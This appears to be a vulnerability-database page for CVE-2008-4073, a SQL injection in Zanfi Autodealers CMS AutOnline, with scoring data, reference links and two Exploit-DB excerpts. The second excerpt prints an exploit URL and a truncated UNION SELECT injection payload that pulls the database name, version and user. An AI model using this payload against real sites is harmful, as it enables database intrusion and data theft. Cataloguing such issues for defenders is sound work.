CVE-2008-4073
published 2008-09-15CVE-2008-4073: SQL injection vulnerability in index.php in Zanfi Autodealers CMS AutOnline allows remote attackers to execute arbitrary SQL commands via the pageid parameter…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.05%
59.9th percentile
SQL injection vulnerability in index.php in Zanfi Autodealers CMS AutOnline allows remote attackers to execute arbitrary SQL commands via the pageid parameter in a DBpAGE action.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Autodealers CMS AutOnline - 'pageid' SQL Injection
exploitdb·2008-09-11
CVE-2008-4074 Autodealers CMS AutOnline - 'pageid' SQL Injection
Autodealers CMS AutOnline - 'pageid' SQL Injection
---
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ \_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE #
# and all darkc0de members ---#
################################################################
#
# Author: r45c4l
#
# Home : www.darkc0de.com
#
# Email : r45c4l
Exploit-DB
Autodealers CMS AutOnline - 'id' SQL Injection
exploitdb·2008-09-11
CVE-2008-4074 Autodealers CMS AutOnline - 'id' SQL Injection
Autodealers CMS AutOnline - 'id' SQL Injection
---
############################################################################################################
[+] Autodealers CMS AutOnline (id) SQL Injection Vulnerability
[+] Discovered By ZoRLu
[+] home: z0rlu.blogspot.com & yildirimordulari.org & r00tsecurity.org & darkc0de.org
[+] Greetz: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs
[+] [email protected] & [email protected]
############################################################################################################
[+]
[+]
[+]
[+]
exploit:
http://localhost/script_path/index.php?page=detail&id=[SQL]
[+]
[+]
[+]
[+]
[SQL]=
ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,versi
No writeups or analysis indexed.
http://securityreason.com/securityalert/4248http://www.securityfocus.com/bid/31120http://www.vupen.com/english/advisories/2008/2551https://exchange.xforce.ibmcloud.com/vulnerabilities/45049https://www.exploit-db.com/exploits/6426http://securityreason.com/securityalert/4248http://www.securityfocus.com/bid/31120http://www.vupen.com/english/advisories/2008/2551https://exchange.xforce.ibmcloud.com/vulnerabilities/45049https://www.exploit-db.com/exploits/6426
2008-09-15
Published